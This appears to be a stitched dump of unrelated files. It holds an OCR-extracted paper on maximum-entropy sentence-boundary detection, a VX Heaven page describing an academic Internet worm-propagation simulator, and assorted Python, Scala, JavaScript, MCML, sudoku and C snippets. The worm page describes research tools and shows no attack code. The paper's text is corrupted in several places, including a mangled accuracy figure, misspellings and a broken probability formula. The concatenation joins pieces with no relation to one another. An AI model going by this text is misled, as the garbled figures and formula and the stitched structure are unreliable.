<SECTION title="1 Introduction" number="1">
<S sid="6" ssid="1">The task of identifying sentence boundaries in text has not received as much attention as it deserves.</S>
<S sid="7" ssid="2">Many freely available natural language processing tools require their input to be divided into sentences, but make no mention of how to accomplish this (e.g.</S>
<S sid="8" ssid="3">(Brill, 1994; Collins, 1996)).</S>
<S sid="9" ssid="4">Others perform the division implicitly without discussing performance (e.g.</S>
<S sid="10" ssid="5">(Cutting et al., 1992)).</S>
<S sid="11" ssid="6">On first glance, it may appear that using a short list, of sentence-final punctuation marks, such as ., ?, and !, is sufficient.</S>
<S sid="12" ssid="7">However, these punctuation marks are not used exclusively to mark sentence breaks.</S>
<S sid="13" ssid="8">For example, embedded quotations may contain any of the sentence-ending punctuation marks and . is used as a decimal point, in email addresses, to indicate ellipsis and in abbreviations.</S>
<S sid="14" ssid="9">Both ! and ? are somewhat less ambiguous *The authors would like to acknowledge the support of ARPA grant N66001-94-C-6043, ARO grant DAAH0494-G-0426 and NSF grant SBR89-20230. but appear in proper names and may be used multiple times for emphasis to mark a single sentence boundary.</S>
<S sid="15" ssid="10">Lexically-based rules could be written and exception lists used to disambiguate the difficult cases described above.</S>
<S sid="16" ssid="11">However, the lists will never be exhaustive, and multiple rules may interact badly since punctuation marks exhibit absorption properties.</S>
<S sid="17" ssid="12">Sites which logically should be marked with multiple punctuation marks will often only have one ((Nunberg, 1990) as summarized in (White, 1995)).</S>
<S sid="18" ssid="13">For example, a sentence-ending abbreviation will most likely not be followed by an additional period if the abbreviation already contains one (e.g. note that D.0 is followed by only a single . in The president lives in Washington, D.C.).</S>
<S sid="19" ssid="14">As a result, we believe that manually writing rules is not a good approach.</S>
<S sid="20" ssid="15">Instead, we present a solution based on a maximum entropy model which requires a few hints about what. information to use and a corpus annotated with sentence boundaries.</S>
<S sid="21" ssid="16">The model trains easily and performs comparably to systems that require vastly more information.</S>
<S sid="22" ssid="17">Training on 39441 sentences takes 18 minutes on a Sun Ultra Sparc and disambiguating the boundaries in a single Wall Street Journal article requires only 1.4 seconds.</S>
</SECTION>
<SECTION title="2 Previous Work" number="2">
<S sid="23" ssid="1">To our knowledge, there have been few papers about identifying sentence boundaries.</S>
<S sid="24" ssid="2">The most recent work will be described in (Palmer and Hearst, To appear).</S>
<S sid="25" ssid="3">There is also a less detailed description of Palmer and Hearst's system, SATZ, in (Palmer and Hearst, 1994).'</S>
<S sid="26" ssid="4">The SATZ architecture uses either a decision tree or a neural network to disambiguate sentence boundaries.</S>
<S sid="27" ssid="5">The neural network achieves 98.5% accuracy on a corpus of Wall Street Journal We recommend these articles for a more comprehensive review of sentence-boundary identification work than we will be able to provide here. articles using a lexicon which includes part-of-speech (POS) tag information.</S>
<S sid="28" ssid="6">By increasing the quantity ol training data and decreasing the size of their test corpus, Palmer and Hearst achieved performance of !</S>
<S sid="29" ssid="7">)8.9% with the neural network.</S>
<S sid="30" ssid="8">They obtained similar results using the decision tree.</S>
<S sid="31" ssid="9">All the results we will present for our algorithms are on their initial, larger test corpus.</S>
<S sid="32" ssid="10">In (Riley, 1989), Riley describes a decision-tree based approach to the problem.</S>
<S sid="33" ssid="11">His performance on I he Brown corpus is 99.8%, using a model learned from a. corpus of 25 million words.</S>
<S sid="34" ssid="12">Liberman and Church suggest in (Liberma.n and Church, 1992) that a. system could be quickly built to divide newswire text into sentences with a nearly negligible error rate, but do not actually build such a system.</S>
</SECTION>
<SECTION title="3 Our Approach" number="3">
<S sid="35" ssid="1">We present two systems for identifying sentence boundaries.</S>
<S sid="36" ssid="2">One is targeted at high performance and uses some knowledge about the structure of English financial newspaper text which may not be applicable to text from other genres or in other languages.</S>
<S sid="37" ssid="3">The other system uses no domain-specific knowledge and is aimed at being portable across English text genres and Roman alphabet languages.</S>
<S sid="38" ssid="4">Potential sentence boundaries are identified by scanning the text for sequences of characters separated by whitespace (tokens) containing one of the symbols !, . or ?.</S>
<S sid="39" ssid="5">We use information about the token containing the potential sentence boundary, as well as contextual information about the tokens immediately to the left and to the right.</S>
<S sid="40" ssid="6">We also conducted tests using wider contexts, but performance did not improve.</S>
<S sid="41" ssid="7">We call the token containing the symbol which marks a putative sentence boundary the Candidate.</S>
<S sid="42" ssid="8">'Hie portion of the Candidate preceding the potential sentence boundary is called the Prefix and the portion following it is called the Suffix.</S>
<S sid="43" ssid="9">The system that focused on maximizing performance used the following hints, or contextual &quot;templates&quot;: The templates specify only the form of the information.</S>
<S sid="44" ssid="10">The exact information used by the maximum entropy model for the potential sentence boundary marked by . in Corp. in Example 1 would be: PreviousWordIsCapitalized, Prefix= Corp, Suffix=NULL, PrefixFeature=CorporateDesignator.</S>
<S sid="45" ssid="11">The highly portable system uses only the identity of the Candidate and its neighboring words, and a list of abbreviations induced from the training data.2 Specifically, the &quot;templates&quot; used are: The information this model would use for Example 1 would be: PreviousWord=ANLP, FollowingWord=chairmon, Prefix=Corp, Suffix=NULL, PrefixFeature=InducedAbbreviation.</S>
<S sid="46" ssid="12">The abbreviation list is automatically produced from the training data, and the contextual questions are also automatically generated by scanning the training data. with question templates.</S>
<S sid="47" ssid="13">As a. result, no hand-crafted rules or lists are required by the highly portable system and it can be easily retrained for other languages or text genres.</S>
</SECTION>
<SECTION title="4 Maximum Entropy" number="4">
<S sid="48" ssid="1">The model used here for sentence-boundary detection is based on the maximum entropy model used for POS tagging in (Ratna.parkhi, 1996).</S>
<S sid="49" ssid="2">For each potential sentence boundary token (., ?, and !</S>
<S sid="50" ssid="3">), we estimate a. joint, probability distribution p of the token and its surrounding context, both of which are denoted by c, occurring as an actual sentence boundary.</S>
<S sid="51" ssid="4">The distribution is given by: p(b, c) = Ir „,,,.f-(b„c), where b e no, yes}, where the cri's are the unknown parameters of the model, and where each aj corresponds to a fi, or a feature.</S>
<S sid="52" ssid="5">Thus the probability of seeing an actual sentence boundary in the context c is given by p(yes, c).</S>
<S sid="53" ssid="6">The contextual information deemed useful for sentence-boundary detection, which. we described earlier, must be encoded using features.</S>
<S sid="54" ssid="7">For example, a useful feature might be: This feature will allow the model to discover that the period at the end of the word Mr. seldom occurs as a sentence boundary.</S>
<S sid="55" ssid="8">Therefore the parameter corresponding to this feature will hopefully boost the probability p(no, c) if the Prefix is Mr.</S>
<S sid="56" ssid="9">The parameters are chosen to maximize the likelihood of the training data, using the Generalized Iterative Scaling (Darroch and Ratcliff, 1972) algorithm.</S>
<S sid="57" ssid="10">The model also can be viewed under the Maximum Entropy framework, in which we choose a distribution p that maximizes the entropy H (p) where /:5(b, c) is the observed distribution of sentenceboundaries and contexts in the training data.</S>
<S sid="58" ssid="11">As a result, the model in practice tends not to commit towards a particular outcome (yes or no) unless it has seen sufficient evidence for that outcome; it is maximally uncertain beyond meeting the evidence.</S>
<S sid="59" ssid="12">All experiments use a simple decision rule to classify each potential sentence boundary: a potential sentence boundary is an actual sentence boundary if and only if p(yesic) > .5, where and where c is the context including the potential sentence boundary.</S>
</SECTION>
<SECTION title="5 System Performance" number="5">
<S sid="60" ssid="1">We trained our system on 39441 sentences (898737 words) of Wall Street Journal text from sections 00 through 24 of the second release of the Penn Treebank3 (Marcus, Santorini, and Marcinkiewicz, 1993).</S>
<S sid="61" ssid="2">We corrected punctuation mistakes and erroneous sentence boundaries in the training data.</S>
<S sid="62" ssid="3">Performance figures for our best performing system, which used a hand-crafted list of honorifics and corporate designators, are shown in Table 1.</S>
<S sid="63" ssid="4">The first test set, WSJ, is Palmer and Hearst's initial test data and the second is the entire Brown corpus.</S>
<S sid="64" ssid="5">We present the Brown corpus performance to show the importance of training on the genre of text. on which testing will be performed.</S>
<S sid="65" ssid="6">Table 1 also shows the number of sentences in each corpus, the number of candidate punctuation marks, the accuracy over potential sentence boundaries, the number of false positives and the number of false negatives.</S>
<S sid="66" ssid="7">Performance on the WSJ corpus was, as we expected, higher than performance on the Brown corpus since we trained the model on financial newspaper text.</S>
<S sid="67" ssid="8">Possibly more significant. than the system's performance is its portability to new domains and languages.</S>
<S sid="68" ssid="9">A trimmed down system which used no information except that derived from the training corpus performs nearly as well, and requires no resources other than a training corpus.</S>
<S sid="69" ssid="10">Its performance on the same two corpora is shown in Table 2.</S>
<S sid="70" ssid="11">Since 39441 training sentences is considerably more than might exist in a new domain or a language other than English, we experimented with the quantity of training data required to maintain performance.</S>
<S sid="71" ssid="12">Table 3 shows performance on the WSJ corpus as a. function of training set size using the best performing system and the more portable system.</S>
<S sid="72" ssid="13">As can seen from the table, performance degrades a.s the quantity of training data decreases, but even with only 500 example sentences performance is beter than the baselines of 64.00/0 if a. sentence boundary is guessed at every potential site and 78.4%, if only token-final instances of sentence-ending punctuation are assumed to be boundaries.</S>
</SECTION>
<SECTION title="6 Conclusions" number="6">
<S sid="73" ssid="1">We have described an approach to identifying sentence boundaries which performs comparably to other state-of-the-art systems that require vastly more resources.</S>
<S sid="74" ssid="2">For example, Riley's performance on the Brown corpus is higher than ours, but his system is trained on the Brown corpus and uses thirty times as much data as our system.</S>
<S sid="75" ssid="3">Also, Palmer L Hearst's system requires POS tag information, which limits its use to those genres or languages for which there are either POS tag lexica or POS tag annotated corpora that could be used to train automatic taggers.</S>
<S sid="76" ssid="4">In comparison, our system does not require POS ta.gs or any supporting resources beyond the sentence-boundary annotated corpus.</S>
<S sid="77" ssid="5">It is therefore easy and inexpensive to retrain this system for different genres of text in English and text in other Roman-alphabet languages.</S>
<S sid="78" ssid="6">Furthermore, we showed tha.t a small training corpus is sufficient for good performance, and we estimate that annotating enough data to achieve good performance would require only several hours of work, in comparison to the many hours required to generate POS tag and lexical probabilities.</S>
</SECTION>
<SECTION title="7 Acknowledgments" number="7">
<S sid="79" ssid="1">We would like to thank David Palmer for giving us the test data he and Marti Hearst used for their sentence detection experiments.</S>
<S sid="80" ssid="2">We would also like to thank the anonymous reviewers for their helpful insights.</S>
</SECTION>
</PAPER>
| {
"pile_set_name": "Github"
} |
# -*- coding:utf-8 -*-
class Solution:
def ReverseSentence(self, s):
# write code here
if not s or len(s) <= 0:
return ''
lis = list(s)
lis = self.Reverse(lis)
start = 0
end = 0
res = ''
lisTmp = []
while end < len(s):
if end == len(s) - 1:
lisTmp.append(self.Reverse(lis[start:]))
break
if lis[start] == ' ':
start += 1
end += 1
lisTmp.append(' ')
elif lis[end] == ' ':
lisTmp.append(self.Reverse(lis[start:end]))
start = end
else:
end += 1
for i in lisTmp:
res += ''.join(i)
return res
def Reverse(self,lis):
if not lis or len(lis) <= 0:
return ''
start = 0
end = len(lis) - 1
while start < end:
lis[start], lis[end] = lis[end], lis[start]
start += 1
end -= 1
return lis | {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Internet Worm Propagation Simulator - Моделювання комп'ютерних вірусів (VX heaven)</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta name="Author" content=""/>
<meta name="KeyWords" lang="en" content="computer virus, virus, virii,vx, компьютерные вирусы, вирус, вири"/>
<meta name="Description" content="Author's description In our research on Internet worm modeling, I have written two Internet worm propagation simulators. One simulator is for simulation of uniform scan worms, such as Code Red and Slammer; another is for simulation of sequential scan worms, such as Blaster. The sequential scan worm simulator assumes that vulnerable hosts are uniformly distributed in BGP routable space. Both are high level simulators for simulating a worm's propagation in the whole Internet. I have not considered packet-level events and Internet topological effect. These simulators do not consider human's countermeasures and congestions caused by worm scan traffic. However, you can decrease the worm's average scan rate in the codes to consider congestion effect; and you can easily modify the codes to consider simple human countermeasures, such as considering the removal of infected hosts that follows Kermack-Mckendrick epidemic model. Both simulators are written in C language for the consideration of simulation speed. They output their simulation results into data files. I write MATLAB programs to draw figures for our papers and to use Kalman filter for early worm detection (please see our papers in CCS'02 and CCS'03). The C simulator for a uniform scan worm is: simulator-codered-100run.cpp The C simulator for a sequential scan worm is: blaster-multiMonitor-100run.cpp The Matlab program for Kalman filter early detection is: KalmanDetection.m The Matlab program to draw a worm's propagation curves is: blasterCodeRedCompare.m The BGP non-overlapping prefix data used in Blaster simulator is (from Route View project for data on Sept. 22, 2003): prefix-len.20030922 The Matlab Simulink program for numerical solution of simple epidemic model is: simpleModel.mdl Notes: The simulators have detailed inline document (both are for 100 simulation runs). For further explanation of formulas, notations, and usage, please see our early worm detection paper in CCS'03 and our recent submitted journal version paper on early worm detection. You can see the Matlab program blasterCodeRedCompare.m to know how to extract data from output data files. In both simulators, we do not use any model. The propagation of a uniform scan worm or a sequential scan follows the simple epidemic model very well when the number of hosts in a simulation is large. MATLAB is very good for data processing and for generating figures for academic paper. We have seen many papers having simulation figures with too small fonts and too thin curves, which can be easily solved by using Matlab. When you use "plot" command in matlab to draw a figure, you can then use the menu in the matlab figure window to directly edit this figure. You can add legend, change font size of labels or axis, change the thickness of curves, add text box, draw lines or arrows, add markers (circle, triangle, square, etc) on curves, change axis' labels, etc. For me, I always first maximize the figure window, then use menu "edit"->"figure property"->"apply template" to change all font size to 20 and curve thickness to 2. In this way, the figure will have clear readable fonts and curves in my paper. You can set up this template by using menu "edit"->"figure property"->"change template". After this "apply template" step, I save the figure in Matlab figure format to prepare for future edition and then export it as a EPS color file for my Latex paper. Thus for each figure, I generate two files, one is .fig and one is .eps. (this .fig is also useful when you make Powerpoint slides) After the "apply template" step, if I need, I can change a curve's line pattern or color, size and name of font of each individual object by first selecting this object, then using menu "edit"->"current object properties". To add readable markers on curves, I use the following command in matlab program to generate figure: t=1:15:1000; plot(t, data(t),'b--'); Then I add markers on this curve through matlab figure window (without "t", markers on one curve will squeeze together). If you use Latex to write academic paper, I have written a document to introduce how to write Latex paper in Windows more conveniently than in Linux."/>
<script type="text/javascript">
//<![CDATA[
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"047a5bcbf67431883fc9ed25fba33612",petok:"506990d424d584beb3e0c22033b09ee50c7a39b2-1498760112-1800",zone:"vxheaven.org",rocket:"a",apps:{}}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=85b614c0f6/cloudflare.min.js"><'+'\/script>');}}catch(e){};
//]]>
</script>
<link rel="icon" href="/favicon.ico" type="image/x-icon"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/>
<link rel="stylesheet" type="text/css" href="/style.css"/>
<script type="text/rocketscript" data-rocketsrc="https://apis.google.com/js/plusone.js">{"parsetags": "explicit"}</script>
</head>
<body bgcolor="#dbc8a0" text="#302000" link="#225599" vlink="#113366">
<div class="s1">
<h1><a href="/" style="text-decoration: none; color: #000000;">VX Heaven</a></h1>
<span class="nav"><a href="/lib/">Бiблiотека</a> <a href="/vl.php">Колекція</a> <a href="/src.php">Тексти вірусів</a> <a href="/vx.php?id=eidx">Двигуни</a> <a href="/vx.php?id=tidx">Конструктори</a> <a href="/vx.php?id=sidx">Моделювання</a> <a href="/vx.php?id=uidx">Утиліти</a> <a href="/links.php">Посилання</a> <a href="/donate.php" style="color: #706020" id="donate">Пожертвувати</a> <a href="/forum" style="text-decoration: underline;">Форум</a> </span><br clear="all"/>
</div>
<div><div style="float:right;"><a href="/vx.php?tbs=0"><img src="/img/min.gif" alt="Minimize"/></a></div> <form id="lf" style="margin: 0; float: right;" method="get" action="/index.php"><input type="hidden" name="action" value="set"/><select name="lang" onchange="javascript:document.getElementById('lf').submit();"><option value="ru">Русский</option><option value="en">English</option><option selected="selected" value="ua">Українська</option><option value="de">Deutsch</option><option value="es">Español</option><option value="fr">Français</option><option value="it">Italiano</option><option value="pl">Polski</option></select></form>
<div style="float: right;"><div id="plusone"></div></div>
<script type="text/rocketscript">gapi.plusone.render("plusone", {"size":"small","count":"true"});</script>
<div style="float: right;" class="addthis_toolbox addthis_default_style">
<script type="text/rocketscript">var addthis_config = { ui_click: true }</script>
<a style="text-decoration: none; font-size: 10pt;" href="/?action=addthis" class="addthis_button_compact">Додайте в закладки</a>
<script type="text/rocketscript" data-rocketsrc="http://s7.addthis.com/js/250/addthis_widget.js#username=herm1t"></script>
</div>
<div style="float: left;">
<script type="text/rocketscript" data-rocketsrc="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
<form action="/search.php" id="cse-search-box">
<input type="hidden" name="cx" value="002577580816726040001:z9_irkorydo"/>
<input type="hidden" name="cof" value="FORID:10"/>
<input type="hidden" name="ie" value="UTF-8"/>
<input type="text" name="q" size="32" value=" "/>
<input type="submit" name="sa" value="Пошук"/>
</form>
</div><br clear="both"/></div>
<div class="s2"> [<a href="/vx.php?id=sh00">Попередня</a>] [<a href="/vx.php?id=sidx">До індексу</a>] [<a href="/vx.php?id=sn00">Наступна</a>] <h1> Internet Worm Propagation Simulator</h1><p><strong>Автор: Zou, Cliff</strong></p><p><strong>Author's description</strong></p>
<p>In our research on Internet worm modeling, I have written two Internet worm propagation simulators. One simulator is for simulation of uniform scan worms, such as Code Red and Slammer; another is for simulation of sequential scan worms, such as Blaster. The sequential scan worm simulator assumes that vulnerable hosts are uniformly distributed in BGP routable space.</p>
<p>Both are high level simulators for simulating a worm's propagation in the whole Internet. I have not considered packet-level events and Internet topological effect. These simulators do not consider human's countermeasures and congestions caused by worm scan traffic. However, you can decrease the worm's average scan rate in the codes to consider congestion effect; and you can easily modify the codes to consider simple human countermeasures, such as considering the removal of infected hosts that follows Kermack-Mckendrick epidemic model.</p>
<p>Both simulators are written in C language for the consideration of simulation speed. They output their simulation results into data files. I write MATLAB programs to draw figures for our papers and to use Kalman filter for early worm detection (please see our papers in CCS'02 and CCS'03).</p>
<ul>
<li>The C simulator for a uniform scan worm is: simulator-codered-100run.cpp</li>
<li>The C simulator for a sequential scan worm is: blaster-multiMonitor-100run.cpp</li>
<li>The Matlab program for Kalman filter early detection is: KalmanDetection.m</li>
<li>The Matlab program to draw a worm's propagation curves is: blasterCodeRedCompare.m</li>
<li>The BGP non-overlapping prefix data used in Blaster simulator is (from Route View project for data on Sept. 22, 2003): prefix-len.20030922</li>
<li>The Matlab Simulink program for numerical solution of simple epidemic model is: simpleModel.mdl</li>
</ul>
<p>Notes:</p>
<ol>
<li>The simulators have detailed inline document (both are for 100 simulation runs). For further explanation of formulas, notations, and usage, please see our early worm detection paper in CCS'03 and our recent submitted journal version paper on early worm detection. You can see the Matlab program blasterCodeRedCompare.m to know how to extract data from output data files.</li>
<li>In both simulators, we do not use any model. The propagation of a uniform scan worm or a sequential scan follows the simple epidemic model very well when the number of hosts in a simulation is large.</li>
<li>MATLAB is very good for data processing and for generating figures for academic paper. We have seen many papers having simulation figures with too small fonts and too thin curves, which can be easily solved by using Matlab. When you use "plot" command in matlab to draw a figure, you can then use the menu in the matlab figure window to directly edit this figure. You can add legend, change font size of labels or axis, change the thickness of curves, add text box, draw lines or arrows, add markers (circle, triangle, square, etc) on curves, change axis' labels, etc.
<p>For me, I always first maximize the figure window, then use menu "edit"->"figure property"->"apply template" to change all font size to 20 and curve thickness to 2. In this way, the figure will have clear readable fonts and curves in my paper. You can set up this template by using menu "edit"->"figure property"->"change template". After this "apply template" step, I save the figure in Matlab figure format to prepare for future edition and then export it as a EPS color file for my Latex paper. Thus for each figure, I generate two files, one is .fig and one is .eps. (this .fig is also useful when you make Powerpoint slides)</p>
<p>After the "apply template" step, if I need, I can change a curve's line pattern or color, size and name of font of each individual object by first selecting this object, then using menu "edit"->"current object properties". To add readable markers on curves, I use the following command in matlab program to generate figure: t=1:15:1000; plot(t, data(t),'b--'); Then I add markers on this curve through matlab figure window (without "t", markers on one curve will squeeze together).</p></li>
<li>If you use Latex to write academic paper, I have written a document to introduce how to write Latex paper in Windows more conveniently than in Linux.</li>
</ol><br clear="all"/><script type="text/rocketscript">var disqus_url = 'http://vxheaven.org/vx.php?id=si00';</script><a href="/vx.php?id=si00#disqus_thread">Коментарі</a><br/><div style="float:left;"><div style="float: left;"><strong>Скачати</strong></div><br clear="all"/><table cellspacing="0" cellpadding="0" border="1"><tr bgcolor="#aaa999"><th> </th><th>Назва файлу</th><th>Розмір</th><th>Description</th><th>Дата</th><th> </th></tr><tr bgcolor="#cccbbb"><td><form class="fr" method="post" action="/file.php"><input type="image" src="/img/dl.gif" alt="Download"/><input type="hidden" name="file" value="c2ltL2l3cHMuemlw"/></form></td><td><a name="f1461"></a><small><a href="/dl/sim/iwps.zip">iwps.zip</a></small></td><td><small>190458</small></td><td><small>IWPS</small></td><td><small>Feb 2004</small></td><td><small style="float: right; font-family: fixed;">MD5 sum 815759fc506fb4b652e9bc47caf6d3c0</small></td></tr></table></div><br clear="all"/><br/><div class="s2">
<div id="disqus_thread"></div>
<script type="text/rocketscript">
/* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
var disqus_shortname = 'vxheaven'; // required: replace example with your forum shortname
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript></div>
<div><small>By accessing, viewing, downloading or otherwise using this content you agree to be bound by the <a href="/agreement.php">Terms of Use</a>!</small> <small>vxheaven.org aka vx.netlux.org</small></div>
<div style="margin-top: 2px; float: left;" class="adsapeu">
<script type="text/rocketscript">
<!--
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
//-->
</script>
</div>
<script data-rocketsrc="http://www.google-analytics.com/urchin.js" type="text/rocketscript"></script><script type="text/rocketscript">try { _uacct = "UA-590608-1"; urchinTracker(); } catch(err) {}</script>
<div style="display: none;"><a href="/vx.php?lang=de&id=si00">de</a><a href="/vx.php?lang=en&id=si00">en</a><a href="/vx.php?lang=es&id=si00">es</a><a href="/vx.php?lang=it&id=si00">it</a><a href="/vx.php?lang=fr&id=si00">fr</a><a href="/vx.php?lang=pl&id=si00">pl</a><a href="/vx.php?lang=ru&id=si00">ru</a><a href="/vx.php?lang=ua&id=si00">ua</a></div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
"""
Some simple logging functionality, inspired by rllab's logging.
Assumes that each diagnostic gets logged each iteration
Call logz.configure_output_dir() to start logging to a
tab-separated-values file (some_folder_name/log.txt)
To load the learning curves, you can do, for example
A = np.genfromtxt('/tmp/expt_1468984536/log.txt',delimiter='\t',dtype=None, names=True)
A['EpRewMean']
"""
import os.path as osp
import time
import os
import subprocess
import atexit
color2num = dict(
gray=30,
red=31,
green=32,
yellow=33,
blue=34,
magenta=35,
cyan=36,
white=37,
crimson=38
)
def colorize(string, color, bold=False, highlight=False):
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
class G:
output_dir = None
output_file = None
first_row = True
log_headers = []
log_current_row = {}
def configure_output_dir(d=None):
"""
Set output directory to d, or to /tmp/somerandomnumber if d is None
"""
G.output_dir = d or "/tmp/experiments/%i"%int(time.time())
#assert not osp.exists(G.output_dir), "Log dir %s already exists! Delete it first or use a different dir"%G.output_dir
if not osp.exists(G.output_dir):
os.makedirs(G.output_dir)
G.output_file = open(osp.join(G.output_dir, "log.txt"), 'w')
atexit.register(G.output_file.close)
try:
cmd = "cd %s && git diff > %s 2>/dev/null"%(osp.dirname(__file__), osp.join(G.output_dir, "a.diff"))
subprocess.check_call(cmd, shell=True) # Save git diff to experiment directory
except subprocess.CalledProcessError:
print("configure_output_dir: not storing the git diff, probably because you're not in a git repo")
print(colorize("Logging data to %s"%G.output_file.name, 'green', bold=True))
def log_tabular(key, val):
"""
Log a value of some diagnostic
Call this once for each diagnostic quantity, each iteration
"""
if G.first_row:
G.log_headers.append(key)
else:
assert key in G.log_headers, "Trying to introduce a new key %s that you didn't include in the first iteration"%key
assert key not in G.log_current_row, "You already set %s this iteration. Maybe you forgot to call dump_tabular()"%key
G.log_current_row[key] = val
def dump_tabular():
"""
Write all of the diagnostics from the current iteration
"""
vals = []
print("-"*37)
for key in G.log_headers:
val = G.log_current_row.get(key, "")
if hasattr(val, "__float__"): valstr = "%8.3g"%val
else: valstr = val
print("| %15s | %15s |"%(key, valstr))
vals.append(val)
print("-"*37)
if G.output_file is not None:
if G.first_row:
G.output_file.write("\t".join(G.log_headers))
G.output_file.write("\n")
G.output_file.write("\t".join(map(str,vals)))
G.output_file.write("\n")
G.output_file.flush()
G.log_current_row.clear()
G.first_row=False | {
"pile_set_name": "Github"
} |
package scorex.core.network.message
import scorex.core.app.Version
import scorex.core.serialization.ScorexSerializer
/**
* Base trait for app p2p messages in the network
*/
trait MessageSpec[Content] extends ScorexSerializer[Content] {
/**
* The p2p protocol version in which this message type first appeared
*/
val protocolVersion: Version
/**
* Code which identifies what message type is contained in the payload
*/
val messageCode: Message.MessageCode
/**
* Name of this message type. For debug purposes only.
*/
val messageName: String
override def toString: String = s"MessageSpec($messageCode: $messageName)"
}
/**
* P2p messages, that where implemented since the beginning.
*/
trait MessageSpecV1[Content] extends MessageSpec[Content] {
override val protocolVersion: Version = Version.initial
} | {
"pile_set_name": "Github"
} |
/**
* Imports
*/
import BaseStore from 'fluxible/addons/BaseStore';
import orderActions from '../../constants/orders';
/**
* Store
*/
class OrderDetailsStore extends BaseStore {
static storeName = 'OrderDetailsStore';
static handlers = {
[orderActions.ORDERS_ITEM]: 'handleFetchRequest',
[orderActions.ORDERS_ITEM_SUCCESS]: 'handleFetchSuccess',
[orderActions.ORDERS_ITEM_ERROR]: 'handleFetchError',
[orderActions.ORDERS_UPDATE]: 'handleSaveRequest',
[orderActions.ORDERS_UPDATE_SUCCESS]: 'handleSaveSuccess',
[orderActions.ORDERS_UPDATE_ERROR]: 'handleSaveError'
};
constructor(dispatcher) {
super(dispatcher);
this.loading = false;
this.saving = false;
this.error = undefined;
this.order = undefined;
}
getState() {
return {
loading: this.loading,
saving: this.saving,
error: this.error,
order: this.order
}
}
//
// Isomorphic stuff
//
dehydrate() {
return this.getState();
}
rehydrate(state) {
this.loading = state.loading;
this.saving = state.saving;
this.error = state.error;
this.order = state.order;
}
//
// Getters
//
isLoading() {
return this.loading === true;
}
isSaving() {
return this.saving === true;
}
getError() {
return this.error;
}
getOrder() {
return this.order;
}
//
// Handlers
//
// Fetch
handleFetchRequest() {
this.loading = true;
this.emitChange();
}
handleFetchSuccess(payload) {
this.loading = false;
this.error = null;
this.order = payload;
this.emitChange();
}
handleFetchError(payload) {
this.loading = false;
this.error = payload;
this.emitChange();
}
// Save
handleSaveRequest() {
this.saving = true;
this.emitChange();
}
handleSaveSuccess(payload) {
this.saving = false;
this.error = null;
this.order = payload;
this.emitChange();
}
handleSaveError(payload) {
this.saving = false;
this.error = payload;
this.emitChange();
}
}
/**
* Export
*/
export default OrderDetailsStore;
| {
"pile_set_name": "Github"
} |
<Mcml xmlns="http://schemas.microsoft.com/2008/mcml"
xmlns:cor="assembly://MSCorLib/System"
xmlns:me="Me">
<!-- IsType conditions are used in "expanded" rule syntax for -->
<!-- adding type comparison to rules. A type is supplied to the -->
<!-- condition which is used to determine if the specified Source -->
<!-- represents that type. -->
<!-- IsType checks if an object "is-a" type (where the type can be -->
<!-- any type, including interfaces). -->
<!-- This example implements a "TypeChecker" UI which will display a -->
<!-- different message depending on what type of object that's -->
<!-- passed into it. -->
<UI Name="IsTypeCondition">
<Content>
<!-- Pass a value into the type checker. Since "Value" is an -->
<!-- object-typed property, full property value syntax must -->
<!-- be used so that the parser knows the type you want (in -->
<!-- this case an integer). -->
<me:TypeChecker>
<Value>
<cor:Int32 Int32="4"/>
</Value>
</me:TypeChecker>
</Content>
</UI>
<!-- TypeChecker: Displays a different message based on type. -->
<UI Name="TypeChecker">
<Properties>
<cor:Object Name="Value"
Object="$Required"/>
</Properties>
<Rules>
<!-- Check for strings. -->
<Rule>
<Conditions>
<IsType Source="[Value]"
Type="cor:String"/>
</Conditions>
<Actions>
<Set Target="[Label.Content]"
Value="IsType says it's a string!"/>
</Actions>
</Rule>
<!-- Check for integers. -->
<Rule>
<Conditions>
<IsType Source="[Value]"
Type="cor:Int32"/>
</Conditions>
<Actions>
<Set Target="[Label.Content]"
Value="IsType says it's an integer!"/>
</Actions>
</Rule>
<!-- Check for floats. -->
<Rule>
<Conditions>
<IsType Source="[Value]"
Type="cor:Single"/>
</Conditions>
<Actions>
<Set Target="[Label.Content]"
Value="IsType says it's a float!"/>
</Actions>
</Rule>
</Rules>
<Content>
<Text Name="Label"
Color="SeaShell"
Font="Verdana,30"/>
</Content>
</UI>
</Mcml>
| {
"pile_set_name": "Github"
} |
1 |6 2|3 5
8 7| 3|4
6 |1 |9
---+---+---
9 | 18|7
3 | |
7 | |
---+---+---
35 |9 |
8 | | 76
| |5 3
| {
"pile_set_name": "Github"
} |
/****************************************************************************/
/*
* nettel.c -- mappings for NETtel/SecureEdge/SnapGear (x86) boards.
*
* (C) Copyright 2000-2001, Greg Ungerer ([email protected])
* (C) Copyright 2001-2002, SnapGear (www.snapgear.com)
*/
/****************************************************************************/
#include <linux/module.h>
#include <linux/init.h>
#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/mtd/mtd.h>
#include <linux/mtd/map.h>
#include <linux/mtd/partitions.h>
#include <linux/mtd/cfi.h>
